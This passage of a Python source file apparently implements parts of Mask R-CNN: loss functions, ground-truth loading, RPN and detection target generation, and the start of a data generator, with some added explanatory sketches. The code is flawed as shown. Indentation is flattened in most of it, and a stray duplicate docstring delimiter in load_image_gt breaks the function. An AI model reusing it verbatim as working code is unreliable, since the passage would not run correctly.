x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv2")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn2')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv3")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn3')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv4")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn4')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2DTranspose(256, (2, 2), strides=2, activation="relu"),
name="mrcnn_mask_deconv")(x)
x = KL.TimeDistributed(KL.Conv2D(num_classes, (1, 1), strides=1, activation="sigmoid"),
name="mrcnn_mask")(x)
return x
############################################################
# Loss Functions
############################################################
def smooth_l1_loss(y_true, y_pred):
"""Implements Smooth-L1 loss.
y_true and y_pred are typically: [N, 4], but could be any shape.
"""
diff = K.abs(y_true - y_pred)
less_than_one = K.cast(K.less(diff, 1.0), "float32")
loss = (less_than_one * 0.5 * diff**2) + (1 - less_than_one) * (diff - 0.5)
return loss
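# --- Illustrative sketch (not part of the original model.py) -----------------
# Worked example of the Smooth-L1 definition above: with diff = |y_true - y_pred|,
# the loss is 0.5 * diff**2 for diff < 1 and diff - 0.5 otherwise. A diff of 0.5
# therefore gives 0.125 and a diff of 2.0 gives 1.5; the quadratic region keeps
# small errors smooth while the linear region limits the influence of outliers.
def _example_smooth_l1_numpy(y_true, y_pred):
    """Hypothetical numpy mirror of smooth_l1_loss() for quick sanity checks."""
    diff = np.abs(np.asarray(y_true, dtype=np.float32) -
                  np.asarray(y_pred, dtype=np.float32))
    return np.where(diff < 1.0, 0.5 * diff ** 2, diff - 0.5)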
def rpn_class_loss_graph(rpn_match, rpn_class_logits):
"""RPN anchor classifier loss.
rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive,
-1=negative, 0=neutral anchor.
rpn_class_logits: [batch, anchors, 2]. RPN classifier logits for BG/FG.
"""
# Squeeze last dim to simplify
rpn_match = tf.squeeze(rpn_match, -1)
# Get anchor classes. Convert the -1/+1 match to 0/1 values.
anchor_class = K.cast(K.equal(rpn_match, 1), tf.int32)
# Positive and Negative anchors contribute to the loss,
# but neutral anchors (match value = 0) don't.
indices = tf.compat.v1.where(K.not_equal(rpn_match, 0))
# Pick rows that contribute to the loss and filter out the rest.
rpn_class_logits = tf.gather_nd(rpn_class_logits, indices)
anchor_class = tf.gather_nd(anchor_class, indices)
# Cross entropy loss
loss = K.sparse_categorical_crossentropy(target=anchor_class,
output=rpn_class_logits,
from_logits=True)
loss = K.switch(tf.size(input=loss) > 0, K.mean(loss), tf.constant(0.0))
return loss
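# --- Illustrative sketch (not part of the original model.py) -----------------
# Small numpy example of the anchor match convention used above: matches of +1
# become foreground targets (class 1), matches of -1 become background targets
# (class 0), and neutral anchors (0) are dropped before the cross entropy.
# For instance, rpn_match = [1, -1, 0, 1] yields targets [1, 0, 1].
def _example_rpn_class_targets(rpn_match):
    """Hypothetical helper; rpn_match is a 1-D numpy array of -1/0/+1 values."""
    rpn_match = np.asarray(rpn_match)
    contributing = rpn_match != 0                    # drop neutral anchors
    anchor_class = (rpn_match[contributing] == 1).astype(np.int32)
    return contributing, anchor_class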
def rpn_bbox_loss_graph(config, target_bbox, rpn_match, rpn_bbox):
"""Return the RPN bounding box loss graph.
config: the model config object.
target_bbox: [batch, max positive anchors, (dy, dx, log(dh), log(dw))].
        Uses 0 padding to fill in unused bbox deltas.
rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive,
-1=negative, 0=neutral anchor.
rpn_bbox: [batch, anchors, (dy, dx, log(dh), log(dw))]
"""
# Positive anchors contribute to the loss, but negative and
# neutral anchors (match value of 0 or -1) don't.
rpn_match = K.squeeze(rpn_match, -1)
indices = tf.compat.v1.where(K.equal(rpn_match, 1))
# Pick bbox deltas that contribute to the loss
rpn_bbox = tf.gather_nd(rpn_bbox, indices)
# Trim target bounding box deltas to the same length as rpn_bbox.
batch_counts = K.sum(K.cast(K.equal(rpn_match, 1), tf.int32), axis=1)
target_bbox = batch_pack_graph(target_bbox, batch_counts,
config.IMAGES_PER_GPU)
loss = smooth_l1_loss(target_bbox, rpn_bbox)
loss = K.switch(tf.size(input=loss) > 0, K.mean(loss), tf.constant(0.0))
return loss
def mrcnn_class_loss_graph(target_class_ids, pred_class_logits,
active_class_ids):
"""Loss for the classifier head of Mask RCNN.
target_class_ids: [batch, num_rois]. Integer class IDs. Uses zero
padding to fill in the array.
pred_class_logits: [batch, num_rois, num_classes]
active_class_ids: [batch, num_classes]. Has a value of 1 for
classes that are in the dataset of the image, and 0
for classes that are not in the dataset.
"""
# During model building, Keras calls this function with
# target_class_ids of type float32. Unclear why. Cast it
# to int to get around it.
target_class_ids = tf.cast(target_class_ids, 'int64')
# Find predictions of classes that are not in the dataset.
pred_class_ids = tf.argmax(input=pred_class_logits, axis=2)
# TODO: Update this line to work with batch > 1. Right now it assumes all
# images in a batch have the same active_class_ids
pred_active = tf.gather(active_class_ids[0], pred_class_ids)
# Loss
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=target_class_ids, logits=pred_class_logits)
# Erase losses of predictions of classes that are not in the active
# classes of the image.
loss = loss * pred_active
    # Compute loss mean. Use only predictions that contribute
# to the loss to get a correct mean.
loss = tf.reduce_sum(input_tensor=loss) / tf.reduce_sum(input_tensor=pred_active)
return loss
def mrcnn_bbox_loss_graph(target_bbox, target_class_ids, pred_bbox):
"""Loss for Mask R-CNN bounding box refinement.
target_bbox: [batch, num_rois, (dy, dx, log(dh), log(dw))]
target_class_ids: [batch, num_rois]. Integer class IDs.
pred_bbox: [batch, num_rois, num_classes, (dy, dx, log(dh), log(dw))]
"""
# Reshape to merge batch and roi dimensions for simplicity.
target_class_ids = K.reshape(target_class_ids, (-1,))
target_bbox = K.reshape(target_bbox, (-1, 4))
pred_bbox = K.reshape(pred_bbox, (-1, K.int_shape(pred_bbox)[2], 4))
# Only positive ROIs contribute to the loss. And only
# the right class_id of each ROI. Get their indices.
positive_roi_ix = tf.compat.v1.where(target_class_ids > 0)[:, 0]
positive_roi_class_ids = tf.cast(
tf.gather(target_class_ids, positive_roi_ix), tf.int64)
indices = tf.stack([positive_roi_ix, positive_roi_class_ids], axis=1)
# Gather the deltas (predicted and true) that contribute to loss
target_bbox = tf.gather(target_bbox, positive_roi_ix)
pred_bbox = tf.gather_nd(pred_bbox, indices)
# Smooth-L1 Loss
loss = K.switch(tf.size(input=target_bbox) > 0,
smooth_l1_loss(y_true=target_bbox, y_pred=pred_bbox),
tf.constant(0.0))
loss = K.mean(loss)
return loss
def mrcnn_mask_loss_graph(target_masks, target_class_ids, pred_masks):
"""Mask binary cross-entropy loss for the masks head.
target_masks: [batch, num_rois, height, width].
A float32 tensor of values 0 or 1. Uses zero padding to fill array.
target_class_ids: [batch, num_rois]. Integer class IDs. Zero padded.
pred_masks: [batch, proposals, height, width, num_classes] float32 tensor
with values from 0 to 1.
"""
# Reshape for simplicity. Merge first two dimensions into one.
target_class_ids = K.reshape(target_class_ids, (-1,))
mask_shape = tf.shape(input=target_masks)
target_masks = K.reshape(target_masks, (-1, mask_shape[2], mask_shape[3]))
pred_shape = tf.shape(input=pred_masks)
pred_masks = K.reshape(pred_masks,
(-1, pred_shape[2], pred_shape[3], pred_shape[4]))
# Permute predicted masks to [N, num_classes, height, width]
pred_masks = tf.transpose(a=pred_masks, perm=[0, 3, 1, 2])
# Only positive ROIs contribute to the loss. And only
# the class specific mask of each ROI.
positive_ix = tf.compat.v1.where(target_class_ids > 0)[:, 0]
positive_class_ids = tf.cast(
tf.gather(target_class_ids, positive_ix), tf.int64)
indices = tf.stack([positive_ix, positive_class_ids], axis=1)
# Gather the masks (predicted and true) that contribute to loss
y_true = tf.gather(target_masks, positive_ix)
y_pred = tf.gather_nd(pred_masks, indices)
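    # Shape note (illustrative, assuming the typical default MASK_SHAPE of
    # [28, 28]): after the two gathers above, both y_true and y_pred have shape
    # [num_positive_rois, 28, 28], i.e. one class-specific mask per positive ROI.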
# Compute binary cross entropy. If no positive ROIs, then return 0.
# shape: [batch, roi, num_classes]
loss = K.switch(tf.size(input=y_true) > 0,
K.binary_crossentropy(target=y_true, output=y_pred),
tf.constant(0.0))
loss = K.mean(loss)
return loss
############################################################
# Data Generator
############################################################
def load_image_gt(dataset, config, image_id, augmentation=None):
"""Load and return ground truth data for an image (image, mask, bounding boxes).
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.
For example, passing imgaug.augmenters.Fliplr(0.5) flips images
right/left 50% of the time.
    Returns:
    image: [height, width, 3]
    image_meta: image attributes packed by compose_image_meta(), including the
        original shape of the image before resizing and cropping.
    class_ids: [instance_count] Integer class IDs
    bbox: [instance_count, (y1, x1, y2, x2)]
    mask: [height, width, instance_count]. The height and width are those
        of the image unless USE_MINI_MASK is True, in which case they are
        defined in MINI_MASK_SHAPE.
    """
"""
# Load image and mask
image = dataset.load_image(image_id)
mask, class_ids = dataset.load_mask(image_id)
original_shape = image.shape
image, window, scale, padding, crop = utils.resize_image(
image,
min_dim=config.IMAGE_MIN_DIM,
min_scale=config.IMAGE_MIN_SCALE,
max_dim=config.IMAGE_MAX_DIM,
mode=config.IMAGE_RESIZE_MODE)
mask = utils.resize_mask(mask, scale, padding, crop)
# Augmentation
# This requires the imgaug lib (https://github.com/aleju/imgaug)
if augmentation:
import imgaug
# Augmenters that are safe to apply to masks
# Some, such as Affine, have settings that make them unsafe, so always
# test your augmentation on masks
MASK_AUGMENTERS = ["Sequential", "SomeOf", "OneOf", "Sometimes",
"Fliplr", "Flipud", "CropAndPad",
"Affine", "PiecewiseAffine"]
def hook(images, augmenter, parents, default):
"""Determines which augmenters to apply to masks."""
return augmenter.__class__.__name__ in MASK_AUGMENTERS
# Store shapes before augmentation to compare
image_shape = image.shape
mask_shape = mask.shape
# Make augmenters deterministic to apply similarly to images and masks
det = augmentation.to_deterministic()
image = det.augment_image(image)
# Change mask to np.uint8 because imgaug doesn't support np.bool
mask = det.augment_image(mask.astype(np.uint8),
hooks=imgaug.HooksImages(activator=hook))
# Verify that shapes didn't change
assert image.shape == image_shape, "Augmentation shouldn't change image size"
assert mask.shape == mask_shape, "Augmentation shouldn't change mask size"
# Change mask back to bool
        mask = mask.astype(bool)  # builtin bool; np.bool is removed in recent NumPy
    # Note that some boxes might be all zeros if the corresponding mask got
    # cropped out, so filter them out here.
_idx = np.sum(mask, axis=(0, 1)) > 0
mask = mask[:, :, _idx]
class_ids = class_ids[_idx]
# Bounding boxes. Note that some boxes might be all zeros
# if the corresponding mask got cropped out.
# bbox: [num_instances, (y1, x1, y2, x2)]
bbox = utils.extract_bboxes(mask)
# Active classes
# Different datasets have different classes, so track the
# classes supported in the dataset of this image.
active_class_ids = np.zeros([dataset.num_classes], dtype=np.int32)
source_class_ids = dataset.source_class_ids[dataset.image_info[image_id]["source"]]
active_class_ids[source_class_ids] = 1
# Resize masks to smaller size to reduce memory usage
if config.USE_MINI_MASK:
mask = utils.minimize_mask(bbox, mask, config.MINI_MASK_SHAPE)
# Image meta data
image_meta = compose_image_meta(image_id, original_shape, image.shape,
window, scale, active_class_ids)
return image, image_meta, class_ids, bbox, mask
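# Illustrative usage of load_image_gt() (not part of the original code; assumes a
# prepared Dataset subclass instance named `dataset` and a Config instance `config`):
#
#     image, image_meta, class_ids, bbox, mask = load_image_gt(
#         dataset, config, dataset.image_ids[0], augmentation=None)
#     # image: [H, W, 3], bbox: [num_instances, 4], mask: [H, W, num_instances]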
def build_detection_targets(rpn_rois, gt_class_ids, gt_boxes, gt_masks, config):
"""Generate targets for training Stage 2 classifier and mask heads.
This is not used in normal training. It's useful for debugging or to train
the Mask RCNN heads without using the RPN head.
Inputs:
rpn_rois: [N, (y1, x1, y2, x2)] proposal boxes.
gt_class_ids: [instance count] Integer class IDs
gt_boxes: [instance count, (y1, x1, y2, x2)]
gt_masks: [height, width, instance count] Ground truth masks. Can be full
size or mini-masks.
Returns:
rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)]
class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs.
bboxes: [TRAIN_ROIS_PER_IMAGE, NUM_CLASSES, (y, x, log(h), log(w))]. Class-specific
bbox refinements.
    masks: [TRAIN_ROIS_PER_IMAGE, height, width, NUM_CLASSES]. Class-specific masks cropped
to bbox boundaries and resized to neural network output size.
"""
assert rpn_rois.shape[0] > 0
assert gt_class_ids.dtype == np.int32, "Expected int but got {}".format(
gt_class_ids.dtype)
assert gt_boxes.dtype == np.int32, "Expected int but got {}".format(
gt_boxes.dtype)
assert gt_masks.dtype == np.bool_, "Expected bool but got {}".format(
gt_masks.dtype)
# It's common to add GT Boxes to ROIs but we don't do that here because
# according to XinLei Chen's paper, it doesn't help.
# Trim empty padding in gt_boxes and gt_masks parts
instance_ids = np.where(gt_class_ids > 0)[0]
assert instance_ids.shape[0] > 0, "Image must contain instances."
gt_class_ids = gt_class_ids[instance_ids]
gt_boxes = gt_boxes[instance_ids]
gt_masks = gt_masks[:, :, instance_ids]
# Compute areas of ROIs and ground truth boxes.
rpn_roi_area = (rpn_rois[:, 2] - rpn_rois[:, 0]) * \
(rpn_rois[:, 3] - rpn_rois[:, 1])
gt_box_area = (gt_boxes[:, 2] - gt_boxes[:, 0]) * \
(gt_boxes[:, 3] - gt_boxes[:, 1])
# Compute overlaps [rpn_rois, gt_boxes]
overlaps = np.zeros((rpn_rois.shape[0], gt_boxes.shape[0]))
for i in range(overlaps.shape[1]):
gt = gt_boxes[i]
overlaps[:, i] = utils.compute_iou(
gt, rpn_rois, gt_box_area[i], rpn_roi_area)
# Assign ROIs to GT boxes
rpn_roi_iou_argmax = np.argmax(overlaps, axis=1)
rpn_roi_iou_max = overlaps[np.arange(
overlaps.shape[0]), rpn_roi_iou_argmax]
# GT box assigned to each ROI
rpn_roi_gt_boxes = gt_boxes[rpn_roi_iou_argmax]
rpn_roi_gt_class_ids = gt_class_ids[rpn_roi_iou_argmax]
# Positive ROIs are those with >= 0.5 IoU with a GT box.
fg_ids = np.where(rpn_roi_iou_max > 0.5)[0]
# Negative ROIs are those with max IoU 0.1-0.5 (hard example mining)
# TODO: To hard example mine or not to hard example mine, that's the question
# bg_ids = np.where((rpn_roi_iou_max >= 0.1) & (rpn_roi_iou_max < 0.5))[0]
bg_ids = np.where(rpn_roi_iou_max < 0.5)[0]
# Subsample ROIs. Aim for 33% foreground.
# FG
fg_roi_count = int(config.TRAIN_ROIS_PER_IMAGE * config.ROI_POSITIVE_RATIO)
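    # e.g. with the typical defaults TRAIN_ROIS_PER_IMAGE=200 and
    # ROI_POSITIVE_RATIO=0.33, fg_roi_count = int(200 * 0.33) = 66.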
if fg_ids.shape[0] > fg_roi_count:
keep_fg_ids = np.random.choice(fg_ids, fg_roi_count, replace=False)
else:
keep_fg_ids = fg_ids
# BG
remaining = config.TRAIN_ROIS_PER_IMAGE - keep_fg_ids.shape[0]
if bg_ids.shape[0] > remaining:
keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False)
else:
keep_bg_ids = bg_ids
# Combine indices of ROIs to keep
keep = np.concatenate([keep_fg_ids, keep_bg_ids])
# Need more?
remaining = config.TRAIN_ROIS_PER_IMAGE - keep.shape[0]
if remaining > 0:
# Looks like we don't have enough samples to maintain the desired
# balance. Reduce requirements and fill in the rest. This is
# likely different from the Mask RCNN paper.
# There is a small chance we have neither fg nor bg samples.
if keep.shape[0] == 0:
# Pick bg regions with easier IoU threshold
bg_ids = np.where(rpn_roi_iou_max < 0.5)[0]
assert bg_ids.shape[0] >= remaining
keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False)
assert keep_bg_ids.shape[0] == remaining
keep = np.concatenate([keep, keep_bg_ids])
else:
# Fill the rest with repeated bg rois.
keep_extra_ids = np.random.choice(
keep_bg_ids, remaining, replace=True)
keep = np.concatenate([keep, keep_extra_ids])
assert keep.shape[0] == config.TRAIN_ROIS_PER_IMAGE, \
"keep doesn't match ROI batch size {}, {}".format(
keep.shape[0], config.TRAIN_ROIS_PER_IMAGE)
# Reset the gt boxes assigned to BG ROIs.
rpn_roi_gt_boxes[keep_bg_ids, :] = 0
rpn_roi_gt_class_ids[keep_bg_ids] = 0
# For each kept ROI, assign a class_id, and for FG ROIs also add bbox refinement.
rois = rpn_rois[keep]
roi_gt_boxes = rpn_roi_gt_boxes[keep]
roi_gt_class_ids = rpn_roi_gt_class_ids[keep]
roi_gt_assignment = rpn_roi_iou_argmax[keep]
# Class-aware bbox deltas. [y, x, log(h), log(w)]
bboxes = np.zeros((config.TRAIN_ROIS_PER_IMAGE,
config.NUM_CLASSES, 4), dtype=np.float32)
pos_ids = np.where(roi_gt_class_ids > 0)[0]
bboxes[pos_ids, roi_gt_class_ids[pos_ids]] = utils.box_refinement(
rois[pos_ids], roi_gt_boxes[pos_ids, :4])
# Normalize bbox refinements
bboxes /= config.BBOX_STD_DEV
# Generate class-specific target masks
masks = np.zeros((config.TRAIN_ROIS_PER_IMAGE, config.MASK_SHAPE[0], config.MASK_SHAPE[1], config.NUM_CLASSES),
dtype=np.float32)
for i in pos_ids:
class_id = roi_gt_class_ids[i]
assert class_id > 0, "class id must be greater than 0"
gt_id = roi_gt_assignment[i]
class_mask = gt_masks[:, :, gt_id]
if config.USE_MINI_MASK:
# Create a mask placeholder, the size of the image
placeholder = np.zeros(config.IMAGE_SHAPE[:2], dtype=bool)
# GT box
gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[gt_id]
gt_w = gt_x2 - gt_x1
gt_h = gt_y2 - gt_y1
# Resize mini mask to size of GT box
placeholder[gt_y1:gt_y2, gt_x1:gt_x2] = \
np.round(utils.resize(class_mask, (gt_h, gt_w))).astype(bool)
            # Place the mini mask in the placeholder
class_mask = placeholder
# Pick part of the mask and resize it
y1, x1, y2, x2 = rois[i].astype(np.int32)
m = class_mask[y1:y2, x1:x2]
mask = utils.resize(m, config.MASK_SHAPE)
masks[i, :, :, class_id] = mask
return rois, roi_gt_class_ids, bboxes, masks
def build_rpn_targets(image_shape, anchors, gt_class_ids, gt_boxes, config):
"""Given the anchors and GT boxes, compute overlaps and identify positive
anchors and deltas to refine them to match their corresponding GT boxes.
anchors: [num_anchors, (y1, x1, y2, x2)]
gt_class_ids: [num_gt_boxes] Integer class IDs.
gt_boxes: [num_gt_boxes, (y1, x1, y2, x2)]
Returns:
rpn_match: [N] (int32) matches between anchors and GT boxes.
1 = positive anchor, -1 = negative anchor, 0 = neutral
rpn_bbox: [N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas.
"""
# RPN Match: 1 = positive anchor, -1 = negative anchor, 0 = neutral
rpn_match = np.zeros([anchors.shape[0]], dtype=np.int32)
# RPN bounding boxes: [max anchors per image, (dy, dx, log(dh), log(dw))]
rpn_bbox = np.zeros((config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4))
# Handle COCO crowds
# A crowd box in COCO is a bounding box around several instances. Exclude
# them from training. A crowd box is given a negative class ID.
crowd_ix = np.where(gt_class_ids < 0)[0]
if crowd_ix.shape[0] > 0:
# Filter out crowds from ground truth class IDs and boxes
non_crowd_ix = np.where(gt_class_ids > 0)[0]
crowd_boxes = gt_boxes[crowd_ix]
gt_class_ids = gt_class_ids[non_crowd_ix]
gt_boxes = gt_boxes[non_crowd_ix]
# Compute overlaps with crowd boxes [anchors, crowds]
crowd_overlaps = utils.compute_overlaps(anchors, crowd_boxes)
crowd_iou_max = np.amax(crowd_overlaps, axis=1)
no_crowd_bool = (crowd_iou_max < 0.001)
else:
        # No anchor intersects a crowd
no_crowd_bool = np.ones([anchors.shape[0]], dtype=bool)
# Compute overlaps [num_anchors, num_gt_boxes]
overlaps = utils.compute_overlaps(anchors, gt_boxes)
# Match anchors to GT Boxes
# If an anchor overlaps a GT box with IoU >= 0.7 then it's positive.
# If an anchor overlaps a GT box with IoU < 0.3 then it's negative.
# Neutral anchors are those that don't match the conditions above,
# and they don't influence the loss function.
# However, don't keep any GT box unmatched (rare, but happens). Instead,
# match it to the closest anchor (even if its max IoU is < 0.3).
#
# 1. Set negative anchors first. They get overwritten below if a GT box is
# matched to them. Skip boxes in crowd areas.
anchor_iou_argmax = np.argmax(overlaps, axis=1)
anchor_iou_max = overlaps[np.arange(overlaps.shape[0]), anchor_iou_argmax]
rpn_match[(anchor_iou_max < 0.3) & (no_crowd_bool)] = -1
# 2. Set an anchor for each GT box (regardless of IoU value).
    # If multiple anchors have the same IoU, match all of them
gt_iou_argmax = np.argwhere(overlaps == np.max(overlaps, axis=0))[:,0]
rpn_match[gt_iou_argmax] = 1
# 3. Set anchors with high overlap as positive.
rpn_match[anchor_iou_max >= 0.7] = 1
# Subsample to balance positive and negative anchors
# Don't let positives be more than half the anchors
ids = np.where(rpn_match == 1)[0]
extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE // 2)
if extra > 0:
# Reset the extra ones to neutral
ids = np.random.choice(ids, extra, replace=False)
rpn_match[ids] = 0
# Same for negative proposals
ids = np.where(rpn_match == -1)[0]
extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE -
np.sum(rpn_match == 1))
if extra > 0:
        # Reset the extra ones to neutral
ids = np.random.choice(ids, extra, replace=False)
rpn_match[ids] = 0
# For positive anchors, compute shift and scale needed to transform them
# to match the corresponding GT boxes.
ids = np.where(rpn_match == 1)[0]
ix = 0 # index into rpn_bbox
# TODO: use box_refinement() rather than duplicating the code here
for i, a in zip(ids, anchors[ids]):
# Closest gt box (it might have IoU < 0.7)
gt = gt_boxes[anchor_iou_argmax[i]]
# Convert coordinates to center plus width/height.
# GT Box
gt_h = gt[2] - gt[0]
gt_w = gt[3] - gt[1]
gt_center_y = gt[0] + 0.5 * gt_h
gt_center_x = gt[1] + 0.5 * gt_w
# Anchor
a_h = a[2] - a[0]
a_w = a[3] - a[1]
a_center_y = a[0] + 0.5 * a_h
a_center_x = a[1] + 0.5 * a_w
# Compute the bbox refinement that the RPN should predict.
rpn_bbox[ix] = [
(gt_center_y - a_center_y) / a_h,
(gt_center_x - a_center_x) / a_w,
np.log(gt_h / a_h),
np.log(gt_w / a_w),
]
# Normalize
rpn_bbox[ix] /= config.RPN_BBOX_STD_DEV
ix += 1
return rpn_match, rpn_bbox
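# Worked example (illustrative, not part of the original code): for a GT box
# (y1, x1, y2, x2) = (10, 10, 50, 50) and an anchor (0, 0, 40, 40):
#     gt_h = gt_w = 40, gt_center = (30, 30); a_h = a_w = 40, a_center = (20, 20)
# so the unnormalized target delta is
#     [(30-20)/40, (30-20)/40, log(40/40), log(40/40)] = [0.25, 0.25, 0.0, 0.0],
# which is then divided element-wise by config.RPN_BBOX_STD_DEV.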
def generate_random_rois(image_shape, count, gt_class_ids, gt_boxes):
"""Generates ROI proposals similar to what a region proposal network
would generate.
image_shape: [Height, Width, Depth]
count: Number of ROIs to generate
gt_class_ids: [N] Integer ground truth class IDs
gt_boxes: [N, (y1, x1, y2, x2)] Ground truth boxes in pixels.
Returns: [count, (y1, x1, y2, x2)] ROI boxes in pixels.
"""
# placeholder
rois = np.zeros((count, 4), dtype=np.int32)
# Generate random ROIs around GT boxes (90% of count)
rois_per_box = int(0.9 * count / gt_boxes.shape[0])
for i in range(gt_boxes.shape[0]):
gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[i]
h = gt_y2 - gt_y1
w = gt_x2 - gt_x1
# random boundaries
r_y1 = max(gt_y1 - h, 0)
r_y2 = min(gt_y2 + h, image_shape[0])
r_x1 = max(gt_x1 - w, 0)
r_x2 = min(gt_x2 + w, image_shape[1])
# To avoid generating boxes with zero area, we generate double what
# we need and filter out the extra. If we get fewer valid boxes
# than we need, we loop and try again.
while True:
y1y2 = np.random.randint(r_y1, r_y2, (rois_per_box * 2, 2))
x1x2 = np.random.randint(r_x1, r_x2, (rois_per_box * 2, 2))
# Filter out zero area boxes
threshold = 1
y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >=
threshold][:rois_per_box]
x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >=
threshold][:rois_per_box]
if y1y2.shape[0] == rois_per_box and x1x2.shape[0] == rois_per_box:
break
# Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape
# into x1, y1, x2, y2 order
x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)
y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)
box_rois = np.hstack([y1, x1, y2, x2])
rois[rois_per_box * i:rois_per_box * (i + 1)] = box_rois
# Generate random ROIs anywhere in the image (10% of count)
remaining_count = count - (rois_per_box * gt_boxes.shape[0])
# To avoid generating boxes with zero area, we generate double what
# we need and filter out the extra. If we get fewer valid boxes
# than we need, we loop and try again.
while True:
y1y2 = np.random.randint(0, image_shape[0], (remaining_count * 2, 2))
x1x2 = np.random.randint(0, image_shape[1], (remaining_count * 2, 2))
# Filter out zero area boxes
threshold = 1
y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >=
threshold][:remaining_count]
x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >=
threshold][:remaining_count]
if y1y2.shape[0] == remaining_count and x1x2.shape[0] == remaining_count:
break
# Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape
# into x1, y1, x2, y2 order
x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)
y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)
global_rois = np.hstack([y1, x1, y2, x2])
rois[-remaining_count:] = global_rois
return rois
class DataGenerator(KU.Sequence):
"""An iterable that returns images and corresponding target class ids,
bounding box deltas, and masks. It inherits from keras.utils.Sequence to avoid data redundancy
when multiprocessing=True.
dataset: The Dataset object to pick data from
config: The model config object
shuffle: If True, shuffles the samples before every epoch
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.
For example, passing imgaug.augmenters.Fliplr(0.5) flips images
right/left 50% of the time.
random_rois: If > 0 then generate proposals to be used to train the
network classifier and mask heads. Useful if training
the Mask RCNN part without the RPN.
detection_targets: If True, generate detection targets (class IDs, bbox
deltas, and masks). Typically for debugging or visualizations because
        in training, detection targets are generated by DetectionTargetLayer.
Returns a Python iterable. Upon calling __getitem__() on it, the
iterable returns two lists, inputs and outputs. The contents
of the lists differ depending on the received arguments:
inputs list:
- images: [batch, H, W, C]
- image_meta: [batch, (meta data)] Image details. See compose_image_meta()
- rpn_match: [batch, N] Integer (1=positive anchor, -1=negative, 0=neutral)
- rpn_bbox: [batch, N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas.
- gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs
- gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)]
- gt_masks: [batch, height, width, MAX_GT_INSTANCES]. The height and width
are those of the image unless use_mini_mask is True, in which
case they are defined in MINI_MASK_SHAPE.
outputs list: Usually empty in regular training. But if detection_targets
is True then the outputs list contains target class_ids, bbox deltas,
and masks.
"""
def __init__(self, dataset, config, shuffle=True, augmentation=None,
random_rois=0, detection_targets=False):
self.image_ids = np.copy(dataset.image_ids)
self.dataset = dataset
self.config = config
# Anchors
# [anchor_count, (y1, x1, y2, x2)]
self.backbone_shapes = compute_backbone_shapes(config, config.IMAGE_SHAPE)
self.anchors = utils.generate_pyramid_anchors(config.RPN_ANCHOR_SCALES,
config.RPN_ANCHOR_RATIOS,
self.backbone_shapes,
config.BACKBONE_STRIDES,
config.RPN_ANCHOR_STRIDE)
self.shuffle = shuffle
self.augmentation = augmentation
self.random_rois = random_rois
self.batch_size = self.config.BATCH_SIZE
self.detection_targets = detection_targets
def __len__(self):
return int(np.ceil(len(self.image_ids) / float(self.batch_size)))
def __getitem__(self, idx):
b = 0
image_index = -1
while b < self.batch_size:
# Increment index to pick next image. Shuffle if at the start of an epoch.
image_index = (image_index + 1) % len(self.image_ids)
if self.shuffle and image_index == 0:
np.random.shuffle(self.image_ids)
# Get GT bounding boxes and masks for image.
image_id = self.image_ids[image_index]
image, image_meta, gt_class_ids, gt_boxes, gt_masks = \
load_image_gt(self.dataset, self.config, image_id,
augmentation=self.augmentation)
# Skip images that have no instances. This can happen in cases
# where we train on a subset of classes and the image doesn't
# have any of the classes we care about.
if not np.any(gt_class_ids > 0):
continue
# RPN Targets
rpn_match, rpn_bbox = build_rpn_targets(image.shape, self.anchors,
gt_class_ids, gt_boxes, self.config)
# Mask R-CNN Targets
if self.random_rois:
rpn_rois = generate_random_rois(
image.shape, self.random_rois, gt_class_ids, gt_boxes)
if self.detection_targets:
rois, mrcnn_class_ids, mrcnn_bbox, mrcnn_mask = \
build_detection_targets(
rpn_rois, gt_class_ids, gt_boxes, gt_masks, self.config)
# Init batch arrays
if b == 0:
batch_image_meta = np.zeros(
(self.batch_size,) + image_meta.shape, dtype=image_meta.dtype)
batch_rpn_match = np.zeros(
[self.batch_size, self.anchors.shape[0], 1], dtype=rpn_match.dtype)
batch_rpn_bbox = np.zeros(
[self.batch_size, self.config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4], dtype=rpn_bbox.dtype)
batch_images = np.zeros(
(self.batch_size,) + image.shape, dtype=np.float32)
batch_gt_class_ids = np.zeros(
(self.batch_size, self.config.MAX_GT_INSTANCES), dtype=np.int32)
batch_gt_boxes = np.zeros(
